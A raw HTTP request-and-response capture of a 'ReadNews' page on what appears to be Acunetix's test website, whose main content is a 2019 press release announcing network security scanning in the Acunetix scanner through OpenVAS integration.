VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 22784Response body (22784 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" 